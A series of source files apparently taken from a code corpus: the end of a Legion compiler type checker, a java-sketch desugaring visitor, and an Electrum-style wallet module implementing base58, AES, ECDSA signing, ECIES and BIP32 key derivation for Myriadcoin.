assert False
if pointer_type != expected_pointer_type:
raise types.TypeError(node, 'Type mismatch for argument %s in call to task %s: expected %s but got %s' % (
1, 'color', expected_pointer_type, pointer_type))
if not types.is_int(color_type):
raise types.TypeError(node, 'Type mismatch for argument %s in call to task %s: expected %s but got %s' % (
2, 'color', types.Int(), color_type))
return coloring_type
@type_check_node.register(ast.ExprUpregion)
def _(node, cx):
region_types = type_check_node(node.regions, cx)
expr_type = type_check_node(node.expr, cx).check_read(node.expr, cx)
for index, region_type in zip(xrange(len(region_types)), region_types):
if not types.is_region(region_type):
raise types.TypeError(node, 'Type mismatch for type argument %s in call to task %s: expected %s but got %s' % (
index, 'upregion', 'a region', region_type))
if not types.is_pointer(expr_type):
raise types.TypeError(node, 'Type mismatch for argument %s in call to task %s: expected %s but got %s' % (
index, 'upregion', 'a pointer', expr_type))
for expr_region in expr_type.regions:
subregion = False
for region_type in region_types:
success, failed_request = types.check_constraints(
[types.Constraint(lhs = expr_region, op = types.Constraint.SUBREGION, rhs = region_type)],
cx.constraints)
if success:
subregion = True
break
if not subregion:
raise types.TypeError(node, 'Invalid constraint %s requested in upregion expression' % (
'%s <= %s' % (expr_region, region_type)))
return types.Pointer(expr_type.points_to_type, region_types)
@type_check_node.register(ast.UpregionRegions)
def _(node, cx):
return [type_check_node(region, cx).check_read(region, cx)
for region in node.regions]
@type_check_node.register(ast.UpregionRegion)
def _(node, cx):
return cx.lookup(node, node.name)
@type_check_node.register(ast.ExprDownregion)
def _(node, cx):
region_types = type_check_node(node.regions, cx)
expr_type = type_check_node(node.expr, cx).check_read(node.expr, cx)
for index, region_type in zip(xrange(len(region_types)), region_types):
if not types.is_region(region_type):
raise types.TypeError(node, 'Type mismatch for type argument %s in call to task %s: expected %s but got %s' % (
index, 'downregion', 'a region', region_type))
if not types.is_pointer(expr_type):
raise types.TypeError(node, 'Type mismatch for argument %s in call to task %s: expected %s but got %s' % (
index, 'downregion', 'a pointer', expr_type))
return types.Pointer(expr_type.points_to_type, region_types)
@type_check_node.register(ast.DownregionRegions)
def _(node, cx):
return [type_check_node(region, cx).check_read(region, cx)
for region in node.regions]
@type_check_node.register(ast.DownregionRegion)
def _(node, cx):
return cx.lookup(node, node.name)
@type_check_node.register(ast.ExprPack)
def _(node, cx):
declared_kind = type_check_node(node.type, cx)
assert types.is_kind(declared_kind)
declared_type = declared_kind.type
region_types = type_check_node(node.regions, cx)
actual_type = declared_type.instantiate_regions(dict(zip(declared_type.regions, region_types)))
expr_type = type_check_node(node.expr, cx).check_read(node.expr, cx)
if expr_type != actual_type:
raise types.TypeError(node, 'Type mismatch in pack: expected %s but got %s' % (
actual_type, expr_type))
success, failed_request = types.check_constraints(actual_type.constraints, cx.constraints)
if not success:
raise types.TypeError(node, 'Invalid constraint %s requested in pack expression' % (
failed_request))
return declared_type
@type_check_node.register(ast.PackRegions)
def _(node, cx):
return [type_check_node(region, cx) for region in node.regions]
@type_check_node.register(ast.PackRegion)
def _(node, cx):
region_type = cx.lookup(node, node.name)
assert types.is_region(region_type)
return region_type
@type_check_node.register(ast.ExprCall)
def _(node, cx):
fn_type = type_check_node(node.function, cx).check_read(node.function, cx)
assert types.is_function(fn_type)
function_name = node.function.name
arg_types = type_check_node(node.args, cx)
region_map = dict(
[(param, arg)
for param, arg in zip(fn_type.param_types, arg_types)
if (types.is_region(param) and types.is_region(arg))
or (types.is_ispace(param) and types.is_ispace(arg))])
param_types = [t.substitute_regions(region_map) for t in fn_type.param_types]
privileges_requested = [t.substitute_regions(region_map) for t in fn_type.privileges]
return_type = fn_type.return_type.substitute_regions(region_map)
if len(param_types) != len(arg_types):
raise types.TypeError(node, 'Incorrect number of arguments for call to task %s: expected %s but got %s' % (
function_name, len(param_types), len(arg_types)))
for param_type, arg_type, index in zip(param_types, arg_types, xrange(len(param_types))):
if types.is_ispace(param_type):
if not types.is_ispace(arg_type) or param_type.kind != arg_type.kind:
raise types.TypeError(node, 'Type mismatch for argument %s in call to task %s: expected %s but got %s' % (
index, function_name, param_type.kind, arg_type))
elif types.is_region(param_type):
# First check that both are regions.
if not types.is_region(arg_type):
raise types.TypeError(node, 'Type mismatch for argument %s in call to task %s: expected %s but got %s' % (
index, function_name, param_type.kind, arg_type))
# Then check that the regions contains compatible types.
param_kind = param_type.kind.substitute_regions(region_map)
arg_kind = arg_type.kind
if param_kind != arg_kind:
raise types.TypeError(node, 'Type mismatch for argument %s in call to task %s: expected %s but got %s' % (
index, function_name, param_kind, arg_kind))
elif param_type != arg_type:
raise types.TypeError(node, 'Type mismatch for argument %s in call to task %s: expected %s but got %s' % (
index, function_name, param_type, arg_type))
success, failed_request = types.check_privileges(privileges_requested, cx)
if not success:
raise types.TypeError(node, 'Invalid privilege %s requested in call to task %s' % (
failed_request, function_name))
return return_type
@type_check_node.register(ast.Args)
def _(node, cx):
return [type_check_node(arg, cx).check_read(arg, cx)
for arg in node.args]
@type_check_node.register(ast.ExprConstBool)
def _(node, cx):
return types.Bool()
@type_check_node.register(ast.ExprConstDouble)
def _(node, cx):
return types.Double()
@type_check_node.register(ast.ExprConstFloat)
def _(node, cx):
return types.Float()
@type_check_node.register(ast.ExprConstInt)
def _(node, cx):
return types.Int()
@type_check_node.register(ast.ExprConstUInt)
def _(node, cx):
return types.UInt()
def type_check(program, opts):
cx = types.Context(opts)
type_check_node(program, cx)
return cx.type_map, cx.constraints, cx.foreign_types
|
SKA-ScienceDataProcessor/legion-sdp-clone
|
deprecated/compiler/lib/lcomp/type_check.py
|
Python
|
apache-2.0
| 56,247
|
# import logging
from ast.visit import visit as v
from ast.node import Node
from ast.body.methoddeclaration import MethodDeclaration
from ast.stmt.minrepeatstmt import MinrepeatStmt
class Desugar(object):
def __init__(self):
self._cur_mtd = None
@v.on("node")
def visit(self, node):
"""
This is the generic method to initialize the dynamic dispatcher
"""
@v.when(Node)
def visit(self, node):
for c in node.childrenNodes: c.accept(self)
@v.when(MethodDeclaration)
def visit(self, node):
self._cur_mtd = node
for c in node.childrenNodes: c.accept(self)
@v.when(MinrepeatStmt)
def visit(self, node):
raise NotImplementedError
# Old impl
# @v.when(Statement)
# def visit(self, node):
# if node.kind == C.S.MINREPEAT:
# b = '\n'.join(map(str, node.b))
# body = u""
# for i in xrange(9): # TODO: parameterize
# body += u"""
# if (??) {{ {} }}
# """.format(b)
# logging.debug(
# "desugaring minrepeat @ {}".format(self._cur_mtd.name))
# return to_statements(self._cur_mtd, body)
# return [node]
|
plum-umd/java-sketch
|
java_sk/rewrite/desugar.py
|
Python
|
mit
| 1,242
|
# -*- coding: utf-8 -*-
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 thomasv@gitorious
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import hashlib
import base64
import re
import sys
import hmac
import version
from util import print_error
try:
import ecdsa
except ImportError:
sys.exit("Error: python-ecdsa does not seem to be installed. Try 'sudo pip install ecdsa'")
try:
import aes
except ImportError:
sys.exit("Error: AES does not seem to be installed. Try 'sudo pip install slowaes'")
################################## transactions
DUST_THRESHOLD = 0
DUST_SOFT_LIMIT = 100000
MIN_RELAY_TX_FEE = 100000
RECOMMENDED_FEE = 100000
COINBASE_MATURITY = 100
# AES encryption
EncodeAES = lambda secret, s: base64.b64encode(aes.encryptData(secret,s))
DecodeAES = lambda secret, e: aes.decryptData(secret, base64.b64decode(e))
def strip_PKCS7_padding(s):
"""return s stripped of PKCS7 padding"""
if len(s)%16 or not s:
raise ValueError("String of len %d can't be PCKS7-padded" % len(s))
numpads = ord(s[-1])
if numpads > 16:
raise ValueError("String ending with %r can't be PCKS7-padded" % s[-1])
if s[-numpads:] != numpads*chr(numpads):
raise ValueError("Invalid PKCS7 padding")
return s[:-numpads]
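# Illustrative examples (a sketch, not part of the original source): PKCS7
# padding appends N copies of chr(N), so for well-formed input:
#     strip_PKCS7_padding('abcdefghijklmno' + '\x01') == 'abcdefghijklmno'
#     strip_PKCS7_padding('x' * 16 + '\x10' * 16)     == 'x' * 16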
def aes_encrypt_with_iv(key, iv, data):
mode = aes.AESModeOfOperation.modeOfOperation["CBC"]
key = map(ord, key)
iv = map(ord, iv)
data = aes.append_PKCS7_padding(data)
keysize = len(key)
assert keysize in aes.AES.keySize.values(), 'invalid key size: %s' % keysize
moo = aes.AESModeOfOperation()
(mode, length, ciph) = moo.encrypt(data, mode, key, keysize, iv)
return ''.join(map(chr, ciph))
def aes_decrypt_with_iv(key, iv, data):
mode = aes.AESModeOfOperation.modeOfOperation["CBC"]
key = map(ord, key)
iv = map(ord, iv)
keysize = len(key)
assert keysize in aes.AES.keySize.values(), 'invalid key size: %s' % keysize
data = map(ord, data)
moo = aes.AESModeOfOperation()
decr = moo.decrypt(data, None, mode, key, keysize, iv)
decr = strip_PKCS7_padding(decr)
return decr
def pw_encode(s, password):
if password:
secret = Hash(password)
return EncodeAES(secret, s.encode("utf8"))
else:
return s
def pw_decode(s, password):
if password is not None:
secret = Hash(password)
try:
d = DecodeAES(secret, s).decode("utf8")
except Exception:
raise Exception('Invalid password')
return d
else:
return s
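# Illustrative note (not part of the original source): pw_encode and pw_decode
# are intended to round-trip, e.g. (assuming slowaes is importable):
#     pw_decode(pw_encode(u'seed words', 'hunter2'), 'hunter2') == u'seed words'
# pw_encode returns the plaintext unchanged when the password is falsy, and
# pw_decode returns its input unchanged only when the password is None.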
def rev_hex(s):
return s.decode('hex')[::-1].encode('hex')
def int_to_hex(i, length=1):
s = hex(i)[2:].rstrip('L')
s = "0"*(2*length - len(s)) + s
return rev_hex(s)
def var_int(i):
# https://en.bitcoin.it/wiki/Protocol_specification#Variable_length_integer
if i<0xfd:
return int_to_hex(i)
elif i<=0xffff:
return "fd"+int_to_hex(i,2)
elif i<=0xffffffff:
return "fe"+int_to_hex(i,4)
else:
return "ff"+int_to_hex(i,8)
def op_push(i):
if i<0x4c:
return int_to_hex(i)
elif i<0xff:
return '4c' + int_to_hex(i)
elif i<0xffff:
return '4d' + int_to_hex(i,2)
else:
return '4e' + int_to_hex(i,4)
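# Illustrative examples (not part of the original source):
#     op_push(5)      == '05'      (lengths < 0x4c are encoded directly)
#     op_push(0x64)   == '4c64'    (OP_PUSHDATA1 + 1-byte length)
#     op_push(0x1234) == '4d3412'  (OP_PUSHDATA2 + little-endian 2-byte length)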
def sha256(x):
return hashlib.sha256(x).digest()
def Hash(x):
if type(x) is unicode: x=x.encode('utf-8')
return sha256(sha256(x))
hash_encode = lambda x: x[::-1].encode('hex')
hash_decode = lambda x: x.decode('hex')[::-1]
hmac_sha_512 = lambda x,y: hmac.new(x, y, hashlib.sha512).digest()
def is_new_seed(x, prefix=version.SEED_BIP44):
import mnemonic
x = mnemonic.prepare_seed(x)
s = hmac_sha_512("Seed version", x.encode('utf8')).encode('hex')
return s.startswith(prefix)
def is_old_seed(seed):
import old_mnemonic
words = seed.strip().split()
try:
old_mnemonic.mn_decode(words)
uses_electrum_words = True
except Exception:
uses_electrum_words = False
try:
seed.decode('hex')
is_hex = (len(seed) == 32)
except Exception:
is_hex = False
return is_hex or (uses_electrum_words and len(words) == 12)
# pywallet openssl private key implementation
def i2d_ECPrivateKey(pkey, compressed=False):
if compressed:
key = '3081d30201010420' + \
'%064x' % pkey.secret + \
'a081a53081a2020101302c06072a8648ce3d0101022100' + \
'%064x' % _p + \
'3006040100040107042102' + \
'%064x' % _Gx + \
'022100' + \
'%064x' % _r + \
'020101a124032200'
else:
key = '308201130201010420' + \
'%064x' % pkey.secret + \
'a081a53081a2020101302c06072a8648ce3d0101022100' + \
'%064x' % _p + \
'3006040100040107044104' + \
'%064x' % _Gx + \
'%064x' % _Gy + \
'022100' + \
'%064x' % _r + \
'020101a144034200'
return key.decode('hex') + i2o_ECPublicKey(pkey.pubkey, compressed)
def i2o_ECPublicKey(pubkey, compressed=False):
# public keys are 65 bytes long (520 bits)
# 0x04 + 32-byte X-coordinate + 32-byte Y-coordinate
# 0x00 = point at infinity, 0x02 and 0x03 = compressed, 0x04 = uncompressed
# compressed keys: <sign> <x> where <sign> is 0x02 if y is even and 0x03 if y is odd
if compressed:
if pubkey.point.y() & 1:
key = '03' + '%064x' % pubkey.point.x()
else:
key = '02' + '%064x' % pubkey.point.x()
else:
key = '04' + \
'%064x' % pubkey.point.x() + \
'%064x' % pubkey.point.y()
return key.decode('hex')
# end pywallet openssl private key implementation
############ functions from pywallet #####################
def hash_160(public_key):
try:
md = hashlib.new('ripemd160')
md.update(sha256(public_key))
return md.digest()
except Exception:
import ripemd
md = ripemd.new(sha256(public_key))
return md.digest()
def public_key_to_bc_address(public_key):
h160 = hash_160(public_key)
return hash_160_to_bc_address(h160)
def hash_160_to_bc_address(h160, addrtype = 50):
vh160 = chr(addrtype) + h160
h = Hash(vh160)
addr = vh160 + h[0:4]
return b58encode(addr)
def bc_address_to_hash_160(addr):
bytes = b58decode(addr, 25)
return ord(bytes[0]), bytes[1:21]
__b58chars = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
__b58base = len(__b58chars)
def b58encode(v):
""" encode v, which is a string of bytes, to base58."""
long_value = 0L
for (i, c) in enumerate(v[::-1]):
long_value += (256**i) * ord(c)
result = ''
while long_value >= __b58base:
div, mod = divmod(long_value, __b58base)
result = __b58chars[mod] + result
long_value = div
result = __b58chars[long_value] + result
# Bitcoin does a little leading-zero-compression:
# leading 0-bytes in the input become leading-1s
nPad = 0
for c in v:
if c == '\0': nPad += 1
else: break
return (__b58chars[0]*nPad) + result
def b58decode(v, length):
""" decode v into a string of len bytes."""
long_value = 0L
for (i, c) in enumerate(v[::-1]):
long_value += __b58chars.find(c) * (__b58base**i)
result = ''
while long_value >= 256:
div, mod = divmod(long_value, 256)
result = chr(mod) + result
long_value = div
result = chr(long_value) + result
nPad = 0
for c in v:
if c == __b58chars[0]: nPad += 1
else: break
result = chr(0)*nPad + result
if length is not None and len(result) != length:
return None
return result
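# Worked examples for the base58 helpers above (a sketch, values computed by hand
# from the functions themselves): each leading zero byte maps to a leading '1'.
#   b58encode('\x00\x01') == '12'
#   b58decode('12', 2)    == '\x00\x01'
#   b58decode('12', 3)    is None      # wrong expected length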
def EncodeBase58Check(vchIn):
hash = Hash(vchIn)
return b58encode(vchIn + hash[0:4])
def DecodeBase58Check(psz):
vchRet = b58decode(psz, None)
key = vchRet[0:-4]
csum = vchRet[-4:]
hash = Hash(key)
cs32 = hash[0:4]
if cs32 != csum:
return None
else:
return key
def PrivKeyToSecret(privkey):
return privkey[9:9+32]
def SecretToASecret(secret, compressed=False, addrtype=50):
vchIn = chr((addrtype+128)&255) + secret
if compressed: vchIn += '\01'
return EncodeBase58Check(vchIn)
def ASecretToSecret(key, addrtype=50):
vch = DecodeBase58Check(key)
if vch and vch[0] == chr((addrtype+128)&255):
return vch[1:]
else:
return False
def regenerate_key(sec):
b = ASecretToSecret(sec)
if not b:
return False
b = b[0:32]
return EC_KEY(b)
def GetPubKey(pubkey, compressed=False):
return i2o_ECPublicKey(pubkey, compressed)
def GetPrivKey(pkey, compressed=False):
return i2d_ECPrivateKey(pkey, compressed)
def GetSecret(pkey):
return ('%064x' % pkey.secret).decode('hex')
def is_compressed(sec):
b = ASecretToSecret(sec)
return len(b) == 33
def public_key_from_private_key(sec):
# rebuild public key from private key, compressed or uncompressed
pkey = regenerate_key(sec)
assert pkey
compressed = is_compressed(sec)
public_key = GetPubKey(pkey.pubkey, compressed)
return public_key.encode('hex')
def address_from_private_key(sec):
public_key = public_key_from_private_key(sec)
address = public_key_to_bc_address(public_key.decode('hex'))
return address
def is_valid(addr):
return is_address(addr)
def is_address(addr):
ADDRESS_RE = re.compile('[1-9A-HJ-NP-Za-km-z]{26,}\\Z')
if not ADDRESS_RE.match(addr): return False
try:
addrtype, h = bc_address_to_hash_160(addr)
except Exception:
return False
return addr == hash_160_to_bc_address(h, addrtype)
def is_private_key(key):
try:
k = ASecretToSecret(key)
return k is not False
except:
return False
########### end pywallet functions #######################
try:
from ecdsa.ecdsa import curve_secp256k1, generator_secp256k1
except Exception:
print "cannot import ecdsa.curve_secp256k1. You probably need to upgrade ecdsa.\nTry: sudo pip install --upgrade ecdsa"
exit()
from ecdsa.curves import SECP256k1
from ecdsa.ellipticcurve import Point
from ecdsa.util import string_to_number, number_to_string
def msg_magic(message):
varint = var_int(len(message))
encoded_varint = "".join([chr(int(varint[i:i+2], 16)) for i in xrange(0, len(varint), 2)])
return "\x1bMyriadcoin Signed Message:\n" + encoded_varint + message
def verify_message(address, signature, message):
try:
EC_KEY.verify_message(address, signature, message)
return True
except Exception as e:
print_error("Verification error: {0}".format(e))
return False
def encrypt_message(message, pubkey):
return EC_KEY.encrypt_message(message, pubkey.decode('hex'))
def chunks(l, n):
return [l[i:i+n] for i in xrange(0, len(l), n)]
def ECC_YfromX(x,curved=curve_secp256k1, odd=True):
_p = curved.p()
_a = curved.a()
_b = curved.b()
for offset in range(128):
Mx = x + offset
My2 = pow(Mx, 3, _p) + _a * pow(Mx, 2, _p) + _b % _p
My = pow(My2, (_p+1)/4, _p )
if curved.contains_point(Mx,My):
if odd == bool(My&1):
return [My,offset]
return [_p-My,offset]
raise Exception('ECC_YfromX: No Y found')
def negative_point(P):
return Point( P.curve(), P.x(), -P.y(), P.order() )
def point_to_ser(P, comp=True ):
if comp:
return ( ('%02x'%(2+(P.y()&1)))+('%064x'%P.x()) ).decode('hex')
return ( '04'+('%064x'%P.x())+('%064x'%P.y()) ).decode('hex')
def ser_to_point(Aser):
curve = curve_secp256k1
generator = generator_secp256k1
_r = generator.order()
assert Aser[0] in ['\x02','\x03','\x04']
if Aser[0] == '\x04':
return Point( curve, string_to_number(Aser[1:33]), string_to_number(Aser[33:]), _r )
Mx = string_to_number(Aser[1:])
return Point( curve, Mx, ECC_YfromX(Mx, curve, Aser[0]=='\x03')[0], _r )
class MyVerifyingKey(ecdsa.VerifyingKey):
@classmethod
def from_signature(klass, sig, recid, h, curve):
""" See http://www.secg.org/download/aid-780/sec1-v2.pdf, chapter 4.1.6 """
from ecdsa import util, numbertheory
import msqr
curveFp = curve.curve
G = curve.generator
order = G.order()
# extract r,s from signature
r, s = util.sigdecode_string(sig, order)
# 1.1
x = r + (recid/2) * order
# 1.3
alpha = ( x * x * x + curveFp.a() * x + curveFp.b() ) % curveFp.p()
beta = msqr.modular_sqrt(alpha, curveFp.p())
y = beta if (beta - recid) % 2 == 0 else curveFp.p() - beta
# 1.4 the constructor checks that nR is at infinity
R = Point(curveFp, x, y, order)
# 1.5 compute e from message:
e = string_to_number(h)
minus_e = -e % order
# 1.6 compute Q = r^-1 (sR - eG)
inv_r = numbertheory.inverse_mod(r,order)
Q = inv_r * ( s * R + minus_e * G )
return klass.from_public_point( Q, curve )
class EC_KEY(object):
def __init__( self, k ):
secret = string_to_number(k)
self.pubkey = ecdsa.ecdsa.Public_key( generator_secp256k1, generator_secp256k1 * secret )
self.privkey = ecdsa.ecdsa.Private_key( self.pubkey, secret )
self.secret = secret
def get_public_key(self, compressed=True):
return point_to_ser(self.pubkey.point, compressed).encode('hex')
def sign_message(self, message, compressed, address):
private_key = ecdsa.SigningKey.from_secret_exponent( self.secret, curve = SECP256k1 )
public_key = private_key.get_verifying_key()
signature = private_key.sign_digest_deterministic( Hash( msg_magic(message) ), hashfunc=hashlib.sha256, sigencode = ecdsa.util.sigencode_string )
assert public_key.verify_digest( signature, Hash( msg_magic(message) ), sigdecode = ecdsa.util.sigdecode_string)
for i in range(4):
sig = base64.b64encode( chr(27 + i + (4 if compressed else 0)) + signature )
try:
self.verify_message( address, sig, message)
return sig
except Exception:
continue
else:
raise Exception("error: cannot sign message")
@classmethod
def verify_message(self, address, signature, message):
sig = base64.b64decode(signature)
if len(sig) != 65: raise Exception("Wrong encoding")
nV = ord(sig[0])
if nV < 27 or nV >= 35:
raise Exception("Bad encoding")
if nV >= 31:
compressed = True
nV -= 4
else:
compressed = False
recid = nV - 27
h = Hash( msg_magic(message) )
public_key = MyVerifyingKey.from_signature( sig[1:], recid, h, curve = SECP256k1 )
# check public key
public_key.verify_digest( sig[1:], h, sigdecode = ecdsa.util.sigdecode_string)
# check that we get the original signing address
addr = public_key_to_bc_address( point_to_ser(public_key.pubkey.point, compressed) )
if address != addr:
raise Exception("Bad signature")
# ECIES encryption/decryption methods; AES-128-CBC with PKCS7 is used as the cipher; hmac-sha256 is used as the mac
@classmethod
def encrypt_message(self, message, pubkey):
pk = ser_to_point(pubkey)
if not ecdsa.ecdsa.point_is_valid(generator_secp256k1, pk.x(), pk.y()):
raise Exception('invalid pubkey')
ephemeral_exponent = number_to_string(ecdsa.util.randrange(pow(2,256)), generator_secp256k1.order())
ephemeral = EC_KEY(ephemeral_exponent)
ecdh_key = point_to_ser(pk * ephemeral.privkey.secret_multiplier)
key = hashlib.sha512(ecdh_key).digest()
iv, key_e, key_m = key[0:16], key[16:32], key[32:]
ciphertext = aes_encrypt_with_iv(key_e, iv, message)
ephemeral_pubkey = ephemeral.get_public_key(compressed=True).decode('hex')
encrypted = 'BIE1' + ephemeral_pubkey + ciphertext
mac = hmac.new(key_m, encrypted, hashlib.sha256).digest()
return base64.b64encode(encrypted + mac)
def decrypt_message(self, encrypted):
encrypted = base64.b64decode(encrypted)
if len(encrypted) < 85:
raise Exception('invalid ciphertext: length')
magic = encrypted[:4]
ephemeral_pubkey = encrypted[4:37]
ciphertext = encrypted[37:-32]
mac = encrypted[-32:]
if magic != 'BIE1':
raise Exception('invalid ciphertext: invalid magic bytes')
try:
ephemeral_pubkey = ser_to_point(ephemeral_pubkey)
except AssertionError, e:
raise Exception('invalid ciphertext: invalid ephemeral pubkey')
if not ecdsa.ecdsa.point_is_valid(generator_secp256k1, ephemeral_pubkey.x(), ephemeral_pubkey.y()):
raise Exception('invalid ciphertext: invalid ephemeral pubkey')
ecdh_key = point_to_ser(ephemeral_pubkey * self.privkey.secret_multiplier)
key = hashlib.sha512(ecdh_key).digest()
iv, key_e, key_m = key[0:16], key[16:32], key[32:]
if mac != hmac.new(key_m, encrypted[:-32], hashlib.sha256).digest():
raise Exception('invalid ciphertext: invalid mac')
return aes_decrypt_with_iv(key_e, iv, ciphertext)
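# ECIES usage sketch (hypothetical key material, not part of the original source).
# The ciphertext layout is base64('BIE1' + 33-byte ephemeral pubkey + AES-128-CBC
# ciphertext + 32-byte HMAC-SHA256), as assembled in encrypt_message above.
#   k = EC_KEY(number_to_string(123456789, generator_secp256k1.order()))
#   blob = EC_KEY.encrypt_message('hello', k.get_public_key().decode('hex'))
#   assert k.decrypt_message(blob) == 'hello'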
###################################### BIP32 ##############################
random_seed = lambda n: "%032x"%ecdsa.util.randrange( pow(2,n) )
BIP32_PRIME = 0x80000000
def get_pubkeys_from_secret(secret):
# public key
private_key = ecdsa.SigningKey.from_string( secret, curve = SECP256k1 )
public_key = private_key.get_verifying_key()
K = public_key.to_string()
K_compressed = GetPubKey(public_key.pubkey,True)
return K, K_compressed
# Child private key derivation function (from master private key)
# k = master private key (32 bytes)
# c = master chain code (extra entropy for key derivation) (32 bytes)
# n = the index of the key we want to derive. (only 32 bits will be used)
# If n is negative (i.e. the 32nd bit is set), the resulting private key's
# corresponding public key can NOT be determined without the master private key.
# However, if n is positive, the resulting private key's corresponding
# public key can be determined without the master private key.
def CKD_priv(k, c, n):
is_prime = n & BIP32_PRIME
return _CKD_priv(k, c, rev_hex(int_to_hex(n,4)).decode('hex'), is_prime)
def _CKD_priv(k, c, s, is_prime):
import hmac
from ecdsa.util import string_to_number, number_to_string
order = generator_secp256k1.order()
keypair = EC_KEY(k)
cK = GetPubKey(keypair.pubkey,True)
data = chr(0) + k + s if is_prime else cK + s
I = hmac.new(c, data, hashlib.sha512).digest()
k_n = number_to_string( (string_to_number(I[0:32]) + string_to_number(k)) % order , order )
c_n = I[32:]
return k_n, c_n
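# Usage sketch for CKD_priv (hypothetical values, not from the original source):
# a normal child mixes the parent *public* key into the HMAC, while a hardened child
# (index with the high bit set) mixes the parent private key, so hardened children
# cannot be derived from the xpub alone.
#   k0, c0   = CKD_priv(master_k, master_c, 0)                # child m/0
#   k0h, c0h = CKD_priv(master_k, master_c, 0 | BIP32_PRIME)  # hardened child m/0'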
# Child public key derivation function (from public key only)
# K = master public key
# c = master chain code
# n = index of key we want to derive
# This function allows us to find the nth public key, as long as n is
# non-negative. If n is negative, we need the master private key to find it.
def CKD_pub(cK, c, n):
if n & BIP32_PRIME: raise Exception("CKD_pub: cannot derive a hardened child from a public key")
return _CKD_pub(cK, c, rev_hex(int_to_hex(n,4)).decode('hex'))
# helper function, callable with arbitrary string
def _CKD_pub(cK, c, s):
import hmac
from ecdsa.util import string_to_number, number_to_string
order = generator_secp256k1.order()
I = hmac.new(c, cK + s, hashlib.sha512).digest()
curve = SECP256k1
pubkey_point = string_to_number(I[0:32])*curve.generator + ser_to_point(cK)
public_key = ecdsa.VerifyingKey.from_public_point( pubkey_point, curve = SECP256k1 )
c_n = I[32:]
cK_n = GetPubKey(public_key.pubkey,True)
return cK_n, c_n
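# Usage sketch for CKD_pub (hypothetical values, not from the original source):
# for a non-hardened index n, CKD_pub(cK, c, n) returns the compressed public key
# matching the private child from CKD_priv(k, c, n), along with the same chain code.
#   cK1, c1 = CKD_pub(master_cK, master_c, 1)   # public-only derivation of m/1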
BITCOIN_HEADER_PRIV = "0488ade4"
BITCOIN_HEADER_PUB = "0488b21e"
TESTNET_HEADER_PRIV = "04358394"
TESTNET_HEADER_PUB = "043587cf"
BITCOIN_HEADERS = (BITCOIN_HEADER_PUB, BITCOIN_HEADER_PRIV)
TESTNET_HEADERS = (TESTNET_HEADER_PUB, TESTNET_HEADER_PRIV)
def _get_headers(testnet):
"""Returns the correct headers for either testnet or bitcoin, in the form
of a 2-tuple, like (public, private)."""
if testnet:
return TESTNET_HEADERS
else:
return BITCOIN_HEADERS
def deserialize_xkey(xkey):
xkey = DecodeBase58Check(xkey)
assert len(xkey) == 78
xkey_header = xkey[0:4].encode('hex')
# Determine if the key is a bitcoin key or a testnet key.
if xkey_header in TESTNET_HEADERS:
head = TESTNET_HEADER_PRIV
elif xkey_header in BITCOIN_HEADERS:
head = BITCOIN_HEADER_PRIV
else:
raise Exception("Unknown xkey header: '%s'" % xkey_header)
depth = ord(xkey[4])
fingerprint = xkey[5:9]
child_number = xkey[9:13]
c = xkey[13:13+32]
if xkey[0:4].encode('hex') == head:
K_or_k = xkey[13+33:]
else:
K_or_k = xkey[13+32:]
return depth, fingerprint, child_number, c, K_or_k
def get_xkey_name(xkey, testnet=False):
depth, fingerprint, child_number, c, K = deserialize_xkey(xkey)
n = int(child_number.encode('hex'), 16)
if n & BIP32_PRIME:
child_id = "%d'"%(n - BIP32_PRIME)
else:
child_id = "%d"%n
if depth == 0:
return ''
elif depth == 1:
return child_id
else:
raise BaseException("xpub depth error")
def xpub_from_xprv(xprv, testnet=False):
depth, fingerprint, child_number, c, k = deserialize_xkey(xprv)
K, cK = get_pubkeys_from_secret(k)
header_pub, _ = _get_headers(testnet)
xpub = header_pub.decode('hex') + chr(depth) + fingerprint + child_number + c + cK
return EncodeBase58Check(xpub)
def bip32_root(seed, testnet=False):
import hmac
header_pub, header_priv = _get_headers(testnet)
I = hmac.new("Bitcoin seed", seed, hashlib.sha512).digest()
master_k = I[0:32]
master_c = I[32:]
K, cK = get_pubkeys_from_secret(master_k)
xprv = (header_priv + "00" + "00000000" + "00000000").decode("hex") + master_c + chr(0) + master_k
xpub = (header_pub + "00" + "00000000" + "00000000").decode("hex") + master_c + cK
return EncodeBase58Check(xprv), EncodeBase58Check(xpub)
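# Note on bip32_root (informational, not from the original source): the two values
# are Base58Check-encoded extended keys; with the mainnet headers above (0488ade4 /
# 0488b21e) they come out with the familiar 'xprv...' / 'xpub...' prefixes.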
def bip32_private_derivation(xprv, branch, sequence, testnet=False):
header_pub, header_priv = _get_headers(testnet)
depth, fingerprint, child_number, c, k = deserialize_xkey(xprv)
assert sequence.startswith(branch)
sequence = sequence[len(branch):]
for n in sequence.split('/'):
if n == '': continue
i = int(n[:-1]) + BIP32_PRIME if n[-1] == "'" else int(n)
parent_k = k
k, c = CKD_priv(k, c, i)
depth += 1
_, parent_cK = get_pubkeys_from_secret(parent_k)
fingerprint = hash_160(parent_cK)[0:4]
child_number = ("%08X"%i).decode('hex')
K, cK = get_pubkeys_from_secret(k)
xprv = header_priv.decode('hex') + chr(depth) + fingerprint + child_number + c + chr(0) + k
xpub = header_pub.decode('hex') + chr(depth) + fingerprint + child_number + c + cK
return EncodeBase58Check(xprv), EncodeBase58Check(xpub)
def bip32_public_derivation(xpub, branch, sequence, testnet=False):
header_pub, _ = _get_headers(testnet)
depth, fingerprint, child_number, c, cK = deserialize_xkey(xpub)
assert sequence.startswith(branch)
sequence = sequence[len(branch):]
for n in sequence.split('/'):
if n == '': continue
i = int(n)
parent_cK = cK
cK, c = CKD_pub(cK, c, i)
depth += 1
fingerprint = hash_160(parent_cK)[0:4]
child_number = ("%08X"%i).decode('hex')
xpub = header_pub.decode('hex') + chr(depth) + fingerprint + child_number + c + cK
return EncodeBase58Check(xpub)
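# Usage sketch for the derivation helpers above (hypothetical path and keys, not
# from the original source): 'sequence' must start with 'branch', and hardened
# steps carry a trailing apostrophe (private derivation only).
#   xprv, xpub   = bip32_root('some seed bytes')
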